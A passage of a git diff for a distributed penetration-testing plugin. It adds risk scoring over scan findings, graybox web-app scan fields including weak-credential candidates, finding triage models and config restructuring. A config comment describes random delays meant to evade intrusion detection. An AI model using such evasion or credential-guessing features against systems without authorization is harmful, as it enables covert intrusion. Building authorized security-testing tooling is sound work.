finding_counts[severity] += 1 + title = finding.get("title", "") + if isinstance(title, str) and "default credential accepted" in title.lower(): + cred_count += 1 + + # A. Iterate service_info findings + service_info = aggregated_report.get("service_info", {}) + for port_key, probes in service_info.items(): + if not isinstance(probes, dict): + continue + for probe_name, probe_data in probes.items(): + if not isinstance(probe_data, dict): + continue + process_findings(probe_data.get("findings", [])) + + # A. Iterate web_tests_info findings + web_tests_info = aggregated_report.get("web_tests_info", {}) + for port_key, tests in web_tests_info.items(): + if not isinstance(tests, dict): + continue + for test_name, test_data in tests.items(): + if not isinstance(test_data, dict): + continue + process_findings(test_data.get("findings", [])) + + # A. Iterate correlation_findings + correlation_findings = aggregated_report.get("correlation_findings", []) + if isinstance(correlation_findings, list): + process_findings(correlation_findings) + + # A. Iterate graybox_results — uses GrayboxFinding.to_flat_finding() + from ..graybox.findings import GrayboxFinding as _GF + graybox_results = aggregated_report.get("graybox_results", {}) + for port_key, probes in graybox_results.items(): + if not isinstance(probes, dict): + continue + for probe_name, probe_data in probes.items(): + if not isinstance(probe_data, dict): + continue + for finding_dict in probe_data.get("findings", []): + if not isinstance(finding_dict, dict): + continue + try: + flat = _GF.flat_from_dict(finding_dict, 0, "unknown", probe_name) + except (TypeError, KeyError, ValueError): + continue + weight = RISK_SEVERITY_WEIGHTS.get(flat["severity"], 0) + multiplier = RISK_CONFIDENCE_MULTIPLIERS.get(flat["confidence"], 0.5) + findings_score += weight * multiplier + if flat["severity"] in finding_counts: + finding_counts[flat["severity"]] += 1 + + # B. Open ports — diminishing returns: 15 × (1 - e^(-ports/8)) + open_ports = aggregated_report.get("open_ports", []) + nr_ports = len(open_ports) if isinstance(open_ports, list) else 0 + open_ports_score = 15.0 * (1.0 - math.exp(-nr_ports / 8.0)) + + # C. Attack surface breadth — distinct protocols: 10 × (1 - e^(-protocols/4)) + port_protocols = aggregated_report.get("port_protocols", {}) + nr_protocols = len(set(port_protocols.values())) if isinstance(port_protocols, dict) else 0 + breadth_score = 10.0 * (1.0 - math.exp(-nr_protocols / 4.0)) + + # D. Default credentials penalty + credentials_penalty = min(cred_count * RISK_CRED_PENALTY_PER, RISK_CRED_PENALTY_CAP) + + # Raw total + raw_total = findings_score + open_ports_score + breadth_score + credentials_penalty + + # Normalize to 0-100 via logistic curve + score = int(round(100.0 * (2.0 / (1.0 + math.exp(-RISK_SIGMOID_K * raw_total)) - 1.0))) + score = max(0, min(100, score)) + + return { + "score": score, + "breakdown": { + "findings_score": round(findings_score, 1), + "open_ports_score": round(open_ports_score, 1), + "breadth_score": round(breadth_score, 1), + "credentials_penalty": credentials_penalty, + "raw_total": round(raw_total, 1), + "finding_counts": finding_counts, + }, + } + + def _compute_risk_and_findings(self, aggregated_report): + """ + Compute risk score AND extract flat findings in a single walk. + + Extends _compute_risk_score to also produce a flat list of enriched + findings from the nested service_info/web_tests_info/correlation structure. + + Parameters + ---------- + aggregated_report : dict + Aggregated report with service_info, web_tests_info, etc. + + Returns + ------- + tuple[dict, list] + (risk_result, flat_findings) where risk_result is {"score": int, "breakdown": dict} + and flat_findings is a list of enriched finding dicts. + """ + import hashlib + import math + + findings_score = 0.0 + finding_counts = {"CRITICAL": 0, "HIGH": 0, "MEDIUM": 0, "LOW": 0, "INFO": 0} + cred_count = 0 + flat_findings = [] + + port_protocols = aggregated_report.get("port_protocols") or {} + + def process_findings(findings_list, port, probe_name, category): + nonlocal findings_score, cred_count + for finding in findings_list: + if not isinstance(finding, dict): + continue + severity = finding.get("severity", "INFO").upper() + confidence = finding.get("confidence", "firm").lower() + weight = RISK_SEVERITY_WEIGHTS.get(severity, 0) + multiplier = RISK_CONFIDENCE_MULTIPLIERS.get(confidence, 0.5) + findings_score += weight * multiplier + if severity in finding_counts: + finding_counts[severity] += 1 + title = finding.get("title", "") + if isinstance(title, str) and "default credential accepted" in title.lower(): + cred_count += 1 + + # Build deterministic finding_id + canon_title = (finding.get("title") or "").lower().strip() + cwe = finding.get("cwe_id", "") + id_input = f"{port}:{probe_name}:{cwe}:{canon_title}" + finding_id = hashlib.sha256(id_input.encode()).hexdigest()[:16] + + protocol = port_protocols.get(str(port), "unknown") + + flat_findings.append({ + "finding_id": finding_id, + **{k: v for k, v in finding.items()}, + "port": port, + "protocol": protocol, + "probe": probe_name, + "category": category, + }) + + def parse_port(port_key): + """Extract integer port from keys like '80/tcp' or '80'.""" + try: + return int(str(port_key).split("/")[0]) + except (ValueError, IndexError): + return 0 + + # Walk service_info + service_info = aggregated_report.get("service_info", {}) + for port_key, probes in service_info.items(): + if not isinstance(probes, dict): + continue + port = parse_port(port_key) + for probe_name, probe_data in probes.items(): + if not isinstance(probe_data, dict): + continue + process_findings(probe_data.get("findings", []), port, probe_name, "service") + + # Walk web_tests_info + web_tests_info = aggregated_report.get("web_tests_info", {}) + for port_key, tests in web_tests_info.items(): + if not isinstance(tests, dict): + continue + port = parse_port(port_key) + for test_name, test_data in tests.items(): + if not isinstance(test_data, dict): + continue + process_findings(test_data.get("findings", []), port, test_name, "web") + + # Walk correlation_findings + correlation_findings = aggregated_report.get("correlation_findings", []) + if isinstance(correlation_findings, list): + process_findings(correlation_findings, 0, "_correlation", "correlation") + + # Walk graybox_results — delegates to GrayboxFinding.to_flat_finding() + from ..graybox.findings import GrayboxFinding as _GF + graybox_results = aggregated_report.get("graybox_results", {}) + for port_key, probes in graybox_results.items(): + if not isinstance(probes, dict): + continue + port = parse_port(port_key) + protocol = port_protocols.get(str(port), "unknown") + for probe_name, probe_data in probes.items(): + if not isinstance(probe_data, dict): + continue + for finding_dict in probe_data.get("findings", []): + if not isinstance(finding_dict, dict): + continue + try: + flat = _GF.flat_from_dict(finding_dict, port, protocol, probe_name) + except (TypeError, KeyError, ValueError): + continue + + weight = RISK_SEVERITY_WEIGHTS.get(flat["severity"], 0) + multiplier = RISK_CONFIDENCE_MULTIPLIERS.get(flat["confidence"], 0.5) + findings_score += weight * multiplier + if flat["severity"] in finding_counts: + finding_counts[flat["severity"]] += 1 + title = flat.get("title", "") + if isinstance(title, str) and "default credential accepted" in title.lower(): + cred_count += 1 + + flat_findings.append(flat) + + # B. Open ports — diminishing returns + open_ports = aggregated_report.get("open_ports", []) + nr_ports = len(open_ports) if isinstance(open_ports, list) else 0 + open_ports_score = 15.0 * (1.0 - math.exp(-nr_ports / 8.0)) + + # C. Attack surface breadth + nr_protocols = len(set(port_protocols.values())) if isinstance(port_protocols, dict) else 0 + breadth_score = 10.0 * (1.0 - math.exp(-nr_protocols / 4.0)) + + # D. Default credentials penalty + credentials_penalty = min(cred_count * RISK_CRED_PENALTY_PER, RISK_CRED_PENALTY_CAP) + + # Deduplicate CVE findings: when the same CVE appears on the same port + # from different probes (behavioral + version-based), keep the higher + # confidence detection and drop the duplicate. + import re as _re_dedup + CONFIDENCE_RANK = {"certain": 3, "firm": 2, "tentative": 1} + cve_best = {} # (cve_id, port) -> index of best finding + drop_indices = set() + for idx, f in enumerate(flat_findings): + title = f.get("title", "") + m = _re_dedup.search(r"CVE-\d{4}-\d+", title) + if not m: + continue + cve_id = m.group(0) + port = f.get("port", 0) + key = (cve_id, port) + conf = CONFIDENCE_RANK.get(f.get("confidence", "tentative"), 0) + if key in cve_best: + prev_idx = cve_best[key] + prev_conf = CONFIDENCE_RANK.get(flat_findings[prev_idx].get("confidence", "tentative"), 0) + if conf > prev_conf: + drop_indices.add(prev_idx) + cve_best[key] = idx + else: + drop_indices.add(idx) + else: + cve_best[key] = idx + + if drop_indices: + flat_findings = [f for i, f in enumerate(flat_findings) if i not in drop_indices] + # Recalculate scores after dedup + findings_score = 0.0 + finding_counts = {"CRITICAL": 0, "HIGH": 0, "MEDIUM": 0, "LOW": 0, "INFO": 0} + cred_count = 0 + for f in flat_findings: + severity = f.get("severity", "INFO").upper() + confidence = f.get("confidence", "firm").lower() + weight = RISK_SEVERITY_WEIGHTS.get(severity, 0) + multiplier = RISK_CONFIDENCE_MULTIPLIERS.get(confidence, 0.5) + findings_score += weight * multiplier + if severity in finding_counts: + finding_counts[severity] += 1 + title = f.get("title", "") + if isinstance(title, str) and "default credential accepted" in title.lower(): + cred_count += 1 + credentials_penalty = min(cred_count * RISK_CRED_PENALTY_PER, RISK_CRED_PENALTY_CAP) + + raw_total = findings_score + open_ports_score + breadth_score + credentials_penalty + score = int(round(100.0 * (2.0 / (1.0 + math.exp(-RISK_SIGMOID_K * raw_total)) - 1.0))) + score = max(0, min(100, score)) + + risk_result = { + "score": score, + "breakdown": { + "findings_score": round(findings_score, 1), + "open_ports_score": round(open_ports_score, 1), + "breadth_score": round(breadth_score, 1), + "credentials_penalty": credentials_penalty, + "raw_total": round(raw_total, 1), + "finding_counts": finding_counts, + }, + } + return risk_result, flat_findings + + def _count_services(self, service_info): + """Count ports that have at least one identified service. + + Parameters + ---------- + service_info : dict + Port-keyed service info dict from aggregated scan data. + + Returns + ------- + int + Number of ports with detected services. + """ + if not isinstance(service_info, dict): + return 0 + count = 0 + for port_key, probes in service_info.items(): + if isinstance(probes, dict) and len(probes) > 0: + count += 1 + return count diff --git a/extensions/business/cybersec/red_mesh/models/__init__.py b/extensions/business/cybersec/red_mesh/models/__init__.py index 5e51335c..9e3754ac 100644 --- a/extensions/business/cybersec/red_mesh/models/__init__.py +++ b/extensions/business/cybersec/red_mesh/models/__init__.py @@ -47,6 +47,11 @@ UiAggregate, JobArchive, ) +from extensions.business.cybersec.red_mesh.models.triage import ( + FindingTriageAuditEntry, + FindingTriageState, + VALID_TRIAGE_STATUSES, +) __all__ = [ # shared @@ -70,4 +75,7 @@ "PassReport", "UiAggregate", "JobArchive", + "FindingTriageState", + "FindingTriageAuditEntry", + "VALID_TRIAGE_STATUSES", ] diff --git a/extensions/business/cybersec/red_mesh/models/archive.py b/extensions/business/cybersec/red_mesh/models/archive.py index 2aa77402..2df1196c 100644 --- a/extensions/business/cybersec/red_mesh/models/archive.py +++ b/extensions/business/cybersec/red_mesh/models/archive.py @@ -14,7 +14,7 @@ from extensions.business.cybersec.red_mesh.models.shared import _strip_none from extensions.business.cybersec.red_mesh.constants import ( - DISTRIBUTION_SLICE, PORT_ORDER_SEQUENTIAL, RUN_MODE_SINGLEPASS, + DISTRIBUTION_SLICE, PORT_ORDER_SEQUENTIAL, RUN_MODE_SINGLEPASS, JOB_ARCHIVE_VERSION, ) @@ -48,6 +48,28 @@ class JobConfig: created_by_name: str = "" created_by_id: str = "" authorized: bool = False + target_confirmation: str = "" + scope_id: str = "" + authorization_ref: str = "" + engagement_metadata: dict = None + target_allowlist: list = None + safety_policy: dict = None + # ── graybox fields ── + scan_type: str = "network" # "network" | "webapp" + target_url: str = "" # required when scan_type == "webapp" + secret_ref: str = "" # reference to separately persisted graybox secrets + has_regular_credentials: bool = False + has_weak_candidates: bool = False + official_username: str = "" + official_password: str = "" + regular_username: str = "" + regular_password: str = "" + weak_candidates: list = None # legacy inline payload; new launches use secret_ref + max_weak_attempts: int = 5 + app_routes: list = None # user-supplied known routes + verify_tls: bool = True # TLS cert verification + target_config: dict = None # GrayboxTargetConfig.to_dict() + allow_stateful_probes: bool = False # gate for A06 workflow probes def to_dict(self) -> dict: return _strip_none(asdict(self)) @@ -78,6 +100,27 @@ def from_dict(cls, d: dict) -> JobConfig: created_by_name=d.get("created_by_name", ""), created_by_id=d.get("created_by_id", ""), authorized=d.get("authorized", False), + target_confirmation=d.get("target_confirmation", ""), + scope_id=d.get("scope_id", ""), + authorization_ref=d.get("authorization_ref", ""), + engagement_metadata=d.get("engagement_metadata"), + target_allowlist=d.get("target_allowlist"), + safety_policy=d.get("safety_policy"), + scan_type=d.get("scan_type", "network"), + target_url=d.get("target_url", ""), + secret_ref=d.get("secret_ref", ""), + has_regular_credentials=d.get("has_regular_credentials", False), + has_weak_candidates=d.get("has_weak_candidates", False), + official_username=d.get("official_username", ""), + official_password=d.get("official_password", ""), + regular_username=d.get("regular_username", ""), + regular_password=d.get("regular_password", ""), + weak_candidates=d.get("weak_candidates"), + max_weak_attempts=d.get("max_weak_attempts", 5), + app_routes=d.get("app_routes"), + verify_tls=d.get("verify_tls", True), + target_config=d.get("target_config"), + allow_stateful_probes=d.get("allow_stateful_probes", False), ) @@ -198,6 +241,12 @@ class UiAggregate: top_findings: list = None # top 10 CRITICAL+HIGH findings for dashboard display finding_timeline: dict = None # { finding_id: { first_seen, last_seen, pass_count } } worker_activity: list = None # [ { id, start_port, end_port, open_ports } ] + # ── graybox-aware ── + scan_type: str = "network" + total_routes_discovered: int = 0 # webapp: discovered routes + total_forms_discovered: int = 0 # webapp: discovered forms + total_scenarios: int = 0 # webapp: probe scenarios run + total_scenarios_vulnerable: int = 0 # webapp: vulnerable count def to_dict(self) -> dict: return _strip_none(asdict(self)) @@ -215,6 +264,11 @@ def from_dict(cls, d: dict) -> UiAggregate: top_findings=d.get("top_findings"), finding_timeline=d.get("finding_timeline"), worker_activity=d.get("worker_activity"), + scan_type=d.get("scan_type", "network"), + total_routes_discovered=d.get("total_routes_discovered", 0), + total_forms_discovered=d.get("total_forms_discovered", 0), + total_scenarios=d.get("total_scenarios", 0), + total_scenarios_vulnerable=d.get("total_scenarios_vulnerable", 0), ) @@ -235,6 +289,7 @@ class JobArchive: duration: float date_created: float date_completed: float + archive_version: int = JOB_ARCHIVE_VERSION start_attestation: dict = None def to_dict(self) -> dict: @@ -242,7 +297,13 @@ def to_dict(self) -> dict: @classmethod def from_dict(cls, d: dict) -> JobArchive: + archive_version = d.get("archive_version", JOB_ARCHIVE_VERSION) + if archive_version != JOB_ARCHIVE_VERSION: + raise ValueError( + f"Unsupported archive_version {archive_version}; expected {JOB_ARCHIVE_VERSION}" + ) return cls( + archive_version=archive_version, job_id=d["job_id"], job_config=d.get("job_config", {}), timeline=d.get("timeline", []), diff --git a/extensions/business/cybersec/red_mesh/models/cstore.py b/extensions/business/cybersec/red_mesh/models/cstore.py index fe17c87e..50df0d73 100644 --- a/extensions/business/cybersec/red_mesh/models/cstore.py +++ b/extensions/business/cybersec/red_mesh/models/cstore.py @@ -17,13 +17,27 @@ @dataclass(frozen=True) class CStoreWorker: - """Worker entry in CStore during job execution.""" + """ + Launcher-owned worker assignment state in CStore during job execution. + + Runtime liveness belongs in the separate ``:live`` namespace. The main job + record keeps durable orchestration metadata such as assignment revisions, + retry tracking, and final report references. + """ start_port: int end_port: int finished: bool = False canceled: bool = False report_cid: str = None result: dict = None # fallback: inline report if R1FS is down + assignment_revision: int = 1 + assigned_at: float = None + reannounce_count: int = 0 + last_reannounce_at: float = None + retry_reason: str = None + terminal_reason: str = None + error: str = None + unreachable_at: float = None def to_dict(self) -> dict: return _strip_none(asdict(self)) @@ -37,6 +51,14 @@ def from_dict(cls, d: dict) -> CStoreWorker: canceled=d.get("canceled", False), report_cid=d.get("report_cid"), result=d.get("result"), + assignment_revision=d.get("assignment_revision", 1), + assigned_at=d.get("assigned_at"), + reannounce_count=d.get("reannounce_count", 0), + last_reannounce_at=d.get("last_reannounce_at"), + retry_reason=d.get("retry_reason"), + terminal_reason=d.get("terminal_reason"), + error=d.get("error"), + unreachable_at=d.get("unreachable_at"), ) @@ -74,6 +96,8 @@ class CStoreJobRunning: launcher: str launcher_alias: str target: str + scan_type: str + target_url: str task_name: str start_port: int end_port: int @@ -84,6 +108,7 @@ class CStoreJobRunning: pass_reports: list # [ PassReportRef.to_dict() ] next_pass_at: float = None risk_score: float = 0 + job_revision: int = 0 redmesh_job_start_attestation: dict = None last_attestation_at: float = None @@ -100,6 +125,8 @@ def from_dict(cls, d: dict) -> CStoreJobRunning: launcher=d["launcher"], launcher_alias=d.get("launcher_alias", ""), target=d["target"], + scan_type=d.get("scan_type", "network"), + target_url=d.get("target_url", ""), task_name=d.get("task_name", ""), start_port=d["start_port"], end_port=d["end_port"], @@ -110,6 +137,7 @@ def from_dict(cls, d: dict) -> CStoreJobRunning: pass_reports=d.get("pass_reports", []), next_pass_at=d.get("next_pass_at"), risk_score=d.get("risk_score", 0), + job_revision=d.get("job_revision", 0), redmesh_job_start_attestation=d.get("redmesh_job_start_attestation"), last_attestation_at=d.get("last_attestation_at"), ) @@ -126,6 +154,8 @@ class CStoreJobFinalized: job_id: str job_status: str # FINALIZED | STOPPED target: str + scan_type: str + target_url: str task_name: str risk_score: float run_mode: str @@ -150,6 +180,8 @@ def from_dict(cls, d: dict) -> CStoreJobFinalized: job_id=d["job_id"], job_status=d["job_status"], target=d["target"], + scan_type=d.get("scan_type", "network"), + target_url=d.get("target_url", ""), task_name=d.get("task_name", ""), risk_score=d.get("risk_score", 0), run_mode=d["run_mode"], @@ -173,11 +205,17 @@ class WorkerProgress: Ephemeral real-time progress published by each worker node. Stored in a separate CStore hset (hkey = f"{instance_id}:live", - key = f"{job_id}:{worker_addr}"). Cleaned up when the pass completes. + key = f"{job_id}:{worker_addr}"). Cleaned up opportunistically when the pass + completes, but reconciliation must remain correct even if stale rows linger. + + These records are worker-owned liveness truth. Launcher retry logic should + match them by ``job_id``, ``pass_nr``, ``worker_addr``, and + ``assignment_revision_seen``. """ job_id: str worker_addr: str pass_nr: int + assignment_revision_seen: int progress: float # 0.0 - 100.0 (stage-based: completed_stages/total * 100) phase: str # port_scan | fingerprint | service_probes | web_tests | correlation ports_scanned: int @@ -185,6 +223,15 @@ class WorkerProgress: open_ports_found: list # [int] — discovered so far completed_tests: list # [str] — which probes finished updated_at: float # unix timestamp + started_at: float = None + first_seen_live_at: float = None + last_seen_at: float = None + error: str = None + report_cid: str = None + scan_type: str = "network" # network | webapp + phase_index: int = 0 # 1-based current stage index; 0 when unknown + total_phases: int = 0 # number of stages in the active phase family + finished: bool = False live_metrics: dict = None # ScanMetrics.to_dict() — partial snapshot, progressively fills in threads: dict = None # {thread_id: {phase, ports_scanned, ports_total, open_ports_found}} @@ -197,13 +244,23 @@ def from_dict(cls, d: dict) -> WorkerProgress: job_id=d["job_id"], worker_addr=d["worker_addr"], pass_nr=d.get("pass_nr", 1), + assignment_revision_seen=d.get("assignment_revision_seen", 1), progress=d.get("progress", 0), phase=d.get("phase", ""), + started_at=d.get("started_at"), + first_seen_live_at=d.get("first_seen_live_at"), + last_seen_at=d.get("last_seen_at", d.get("updated_at", 0)), + error=d.get("error"), + report_cid=d.get("report_cid"), + scan_type=d.get("scan_type", "network"), + phase_index=d.get("phase_index", 0), + total_phases=d.get("total_phases", 0), ports_scanned=d.get("ports_scanned", 0), ports_total=d.get("ports_total", 0), open_ports_found=d.get("open_ports_found", []), completed_tests=d.get("completed_tests", []), updated_at=d.get("updated_at", 0), + finished=d.get("finished", False), live_metrics=d.get("live_metrics"), threads=d.get("threads"), ) diff --git a/extensions/business/cybersec/red_mesh/models/shared.py b/extensions/business/cybersec/red_mesh/models/shared.py index bc0e6d4e..b565e31f 100644 --- a/extensions/business/cybersec/red_mesh/models/shared.py +++ b/extensions/business/cybersec/red_mesh/models/shared.py @@ -124,6 +124,13 @@ class ScanMetrics: open_port_details: list = None # [ { "port": 22, "protocol": "ssh", "banner_confirmed": True }, ... ] banner_confirmation: dict = None # { "confirmed": 3, "guessed": 2 } + # ── Graybox scenario stats (webapp scans only) ── + scenarios_total: int = 0 + scenarios_vulnerable: int = 0 + scenarios_clean: int = 0 + scenarios_inconclusive: int = 0 + scenarios_error: int = 0 + def to_dict(self) -> dict: return _strip_none(asdict(self)) @@ -150,4 +157,9 @@ def from_dict(cls, d: dict) -> ScanMetrics: finding_distribution=d.get("finding_distribution"), open_port_details=d.get("open_port_details"), banner_confirmation=d.get("banner_confirmation"), + scenarios_total=d.get("scenarios_total", 0), + scenarios_vulnerable=d.get("scenarios_vulnerable", 0), + scenarios_clean=d.get("scenarios_clean", 0), + scenarios_inconclusive=d.get("scenarios_inconclusive", 0), + scenarios_error=d.get("scenarios_error", 0), ) diff --git a/extensions/business/cybersec/red_mesh/models/triage.py b/extensions/business/cybersec/red_mesh/models/triage.py new file mode 100644 index 00000000..ad137714 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/models/triage.py @@ -0,0 +1,70 @@ +from __future__ import annotations + +from dataclasses import dataclass, asdict + +from extensions.business.cybersec.red_mesh.models.shared import _strip_none + + +VALID_TRIAGE_STATUSES = frozenset({ + "open", + "accepted_risk", + "false_positive", + "remediated", + "reopened", +}) + + +@dataclass(frozen=True) +class FindingTriageState: + job_id: str + finding_id: str + status: str = "open" + note: str = "" + actor: str = "" + updated_at: float = 0.0 + review_at: float = None + + def to_dict(self) -> dict: + return _strip_none(asdict(self)) + + @classmethod + def from_dict(cls, d: dict) -> "FindingTriageState": + status = d.get("status", "open") + if status not in VALID_TRIAGE_STATUSES: + raise ValueError(f"Unsupported triage status: {status}") + return cls( + job_id=d["job_id"], + finding_id=d["finding_id"], + status=status, + note=d.get("note", ""), + actor=d.get("actor", ""), + updated_at=float(d.get("updated_at", 0.0) or 0.0), + review_at=d.get("review_at"), + ) + + +@dataclass(frozen=True) +class FindingTriageAuditEntry: + job_id: str + finding_id: str + status: str + note: str = "" + actor: str = "" + timestamp: float = 0.0 + + def to_dict(self) -> dict: + return _strip_none(asdict(self)) + + @classmethod + def from_dict(cls, d: dict) -> "FindingTriageAuditEntry": + status = d.get("status", "open") + if status not in VALID_TRIAGE_STATUSES: + raise ValueError(f"Unsupported triage status: {status}") + return cls( + job_id=d["job_id"], + finding_id=d["finding_id"], + status=status, + note=d.get("note", ""), + actor=d.get("actor", ""), + timestamp=float(d.get("timestamp", 0.0) or 0.0), + ) diff --git a/extensions/business/cybersec/red_mesh/pentester_api_01.py b/extensions/business/cybersec/red_mesh/pentester_api_01.py index c10c01fc..243903b2 100644 --- a/extensions/business/cybersec/red_mesh/pentester_api_01.py +++ b/extensions/business/cybersec/red_mesh/pentester_api_01.py @@ -30,20 +30,22 @@ """ -import ipaddress import random - -from urllib.parse import urlparse +from collections import deque from naeural_core.business.default.web_app.fast_api_web_app import FastApiWebAppPlugin as BasePlugin -from .pentest_worker import PentestLocalWorker -from .redmesh_llm_agent_mixin import _RedMeshLlmAgentMixin +from .mixins import ( + _RedMeshLlmAgentMixin, _AttestationMixin, _RiskScoringMixin, + _ReportMixin, _LiveProgressMixin, +) from .models import ( JobConfig, PassReport, PassReportRef, WorkerReportMeta, AggregatedScanData, - CStoreJobFinalized, UiAggregate, JobArchive, WorkerProgress, + CStoreJobFinalized, JobArchive, WorkerProgress, ) from .constants import ( FEATURE_CATALOG, + ScanType, + JOB_ARCHIVE_VERSION, JOB_STATUS_RUNNING, JOB_STATUS_COLLECTING, JOB_STATUS_ANALYZING, @@ -53,6 +55,7 @@ JOB_STATUS_FINALIZED, RUN_MODE_SINGLEPASS, RUN_MODE_CONTINUOUS_MONITORING, + MAX_CONTINUOUS_PASSES, DISTRIBUTION_SLICE, DISTRIBUTION_MIRROR, PORT_ORDER_SHUFFLE, @@ -60,35 +63,70 @@ LLM_ANALYSIS_SECURITY_ASSESSMENT, LLM_ANALYSIS_VULNERABILITY_SUMMARY, LLM_ANALYSIS_REMEDIATION_PLAN, - RISK_SEVERITY_WEIGHTS, - RISK_CONFIDENCE_MULTIPLIERS, - RISK_SIGMOID_K, - RISK_CRED_PENALTY_PER, - RISK_CRED_PENALTY_CAP, LOCAL_WORKERS_MIN, LOCAL_WORKERS_MAX, LOCAL_WORKERS_DEFAULT, - PROGRESS_PUBLISH_INTERVAL, PHASE_ORDER, + GRAYBOX_PHASE_ORDER, PHASE_MARKERS, ) +from .services import ( + announce_launch, + build_network_workers, + build_webapp_workers, + get_job_analysis, + coerce_scan_type, + get_job_archive, + get_job_triage, + get_job_data, + get_job_progress, + get_scan_strategy, + is_intermediate_job_status, + is_terminal_job_status, + iter_scan_strategies, + launch_local_jobs, + launch_network_scan, + launch_test, + launch_webapp_scan, + list_local_jobs, + list_network_jobs, + maybe_finalize_pass, + normalize_common_launch_options, + parse_exceptions, + purge_job, + get_llm_agent_config, + get_distributed_job_reconciliation_config, + reconcile_job_workers, + resolve_job_config_secrets, + resolve_active_peers, + resolve_enabled_features, + set_job_status, + stop_and_delete_job, + stop_monitoring, + update_finding_triage, + validation_error, +) +from .repositories import ArtifactRepository, JobStateRepository + +# Human-readable phase labels for progress reporting +PHASE_LABELS = { + # blackbox + "port_scan": "Scanning ports", + "fingerprint": "Fingerprinting services", + "service_probes": "Running service probes", + "web_tests": "Testing web vulnerabilities", + "correlation": "Correlating findings", + # graybox + "preflight": "Checking target", + "authentication": "Authenticating", + "discovery": "Discovering routes", + "graybox_probes": "Running application probes", + "weak_auth": "Testing credentials", +} __VER__ = '0.9.0' -def _thread_phase(state): - """Determine which phase a single thread is currently in.""" - tests = set(state.get("completed_tests", [])) - if "correlation_completed" in tests: - return "done" - if "web_tests_completed" in tests: - return "correlation" - if "service_info_completed" in tests: - return "web_tests" - if "fingerprint_completed" in tests: - return "service_probes" - return "port_scan" - _CONFIG = { **BasePlugin.CONFIG, @@ -115,17 +153,35 @@ def _thread_phase(state): "RUN_MODE": RUN_MODE_SINGLEPASS, "MONITOR_INTERVAL": 60, # seconds between passes in continuous mode "MONITOR_JITTER": 5, # random jitter to avoid simultaneous CStore writes + "PROGRESS_PUBLISH_INTERVAL": 30, # seconds between live progress writes to CStore + "DISTRIBUTED_JOB_RECONCILIATION": { + "STARTUP_TIMEOUT": 45, # seconds to wait for worker-owned :live startup signal + "STALE_TIMEOUT": 120, # seconds before launcher treats worker :live as stale + "STALE_GRACE": 30, # extra grace before retrying a stale worker assignment + "MAX_REANNOUNCE_ATTEMPTS": 3, # bounded per-worker retries before terminal failure + }, + "ARCHIVE_VERIFY_RETRIES": 3, + "LLM_API_RETRIES": 2, + "NETWORK_CONCURRENCY_WARNING_THRESHOLD": 16, + "GRAYBOX_BUDGETS": { + "AUTH_ATTEMPTS": 10, + "ROUTE_DISCOVERY": 100, + "STATEFUL_ACTIONS": 1, + }, + "SCAN_TARGET_ALLOWLIST": [], # Dune sand walking - random delays between operations to evade IDS detection "SCAN_MIN_RND_DELAY": 0.0, # minimum delay in seconds (0 = disabled) "SCAN_MAX_RND_DELAY": 0.0, # maximum delay in seconds (0 = disabled) # LLM Agent API integration for auto-analysis - "LLM_AGENT_API_ENABLED": False, # Enable LLM-powered analysis + "LLM_AGENT": { + "ENABLED": False, # Enable LLM-powered analysis + "TIMEOUT": 120, # Timeout in seconds for LLM API calls + "AUTO_ANALYSIS_TYPE": "security_assessment", # Default analysis type + }, "LLM_AGENT_API_HOST": "127.0.0.1", # Host where LLM Agent API is running "LLM_AGENT_API_PORT": None, # Port for LLM Agent API (required if enabled) - "LLM_AGENT_API_TIMEOUT": 120, # Timeout in seconds for LLM API calls - "LLM_AUTO_ANALYSIS_TYPE": "security_assessment", # Default analysis type # Security hardening controls "REDACT_CREDENTIALS": True, # Strip passwords from persisted reports @@ -135,16 +191,19 @@ def _thread_phase(state): "SCANNER_USER_AGENT": "", # HTTP User-Agent (empty = default requests UA) # RedMesh attestation submission - "ATTESTATION_PRIVATE_KEY": "", - "ATTESTATION_ENABLED": True, - "ATTESTATION_MIN_SECONDS_BETWEEN_SUBMITS": 86400, + "ATTESTATION": { + "ENABLED": True, + "PRIVATE_KEY": "", + "MIN_SECONDS_BETWEEN_SUBMITS": 86400, + "RETRIES": 2, + }, 'VALIDATION_RULES': { **BasePlugin.CONFIG['VALIDATION_RULES'], }, } -class PentesterApi01Plugin(BasePlugin, _RedMeshLlmAgentMixin): +class PentesterApi01Plugin(BasePlugin, _RedMeshLlmAgentMixin, _AttestationMixin, _RiskScoringMixin, _ReportMixin, _LiveProgressMixin): """ RedMesh API plugin for orchestrating decentralized pentest jobs. @@ -166,6 +225,8 @@ class PentesterApi01Plugin(BasePlugin, _RedMeshLlmAgentMixin): """ CONFIG = _CONFIG REDMESH_ATTESTATION_DOMAIN = "0xced141225d43c56d8b224d12f0b9524a15dc86df0113c42ffa4bc859309e0d40" + REDMESH_ATTESTATION_NETWORK = "base-sepolia" + AUDIT_LOG_MAX_ENTRIES = 1000 def on_init(self): @@ -178,13 +239,20 @@ def on_init(self): """ super(PentesterApi01Plugin, self).on_init() self.__features = self._get_all_features() + self._validate_feature_catalog() # Track active and completed jobs by target self.scan_jobs = {} # target -> PentestJob instance self.completed_jobs_reports = {} # target -> final report dict self.lst_completed_jobs = [] # List of completed jobs - self._audit_log = [] # Structured audit event log + self._audit_log = deque(maxlen=self.AUDIT_LOG_MAX_ENTRIES) # Structured audit event log self.__last_checked_jobs = 0 self._last_progress_publish = 0 # timestamp of last live progress publish + self._progress_publish_interval = self._get_progress_publish_interval() + self._job_state_repository = JobStateRepository(self) + self._artifact_repository = ArtifactRepository(self) + self._active_execution_identities = {} # {job_id: (job_id, pass_nr, worker_addr, assignment_revision)} + self._execution_live_meta = {} # {job_id: startup metadata for worker-owned :live publishing} + self._last_worker_reconcile_check = 0 self._foreign_jobs_logged = set() # job IDs we already logged "no worker entry" for self.__warmupstart = self.time() self.__warmup_done = False @@ -198,6 +266,20 @@ def on_init(self): )) return + def _get_job_state_repository(self): + repo = self.__dict__.get("_job_state_repository") + if not isinstance(repo, JobStateRepository): + repo = JobStateRepository(self) + self._job_state_repository = repo + return repo + + def _get_artifact_repository(self): + repo = self.__dict__.get("_artifact_repository") + if not isinstance(repo, ArtifactRepository): + repo = ArtifactRepository(self) + self._artifact_repository = repo + return repo + def _setup_semaphore_env(self): """Set semaphore environment variables for paired plugins.""" @@ -267,246 +349,6 @@ def Pd(self, s, *args, score=-1, **kwargs): return - def _attestation_get_tenant_private_key(self): - private_key = self.cfg_attestation_private_key - if private_key: - private_key = private_key.strip() - if not private_key: - return None - return private_key - - @staticmethod - def _attestation_pack_cid_obfuscated(report_cid) -> str: - if not isinstance(report_cid, str) or len(report_cid.strip()) == 0: - return "0x" + 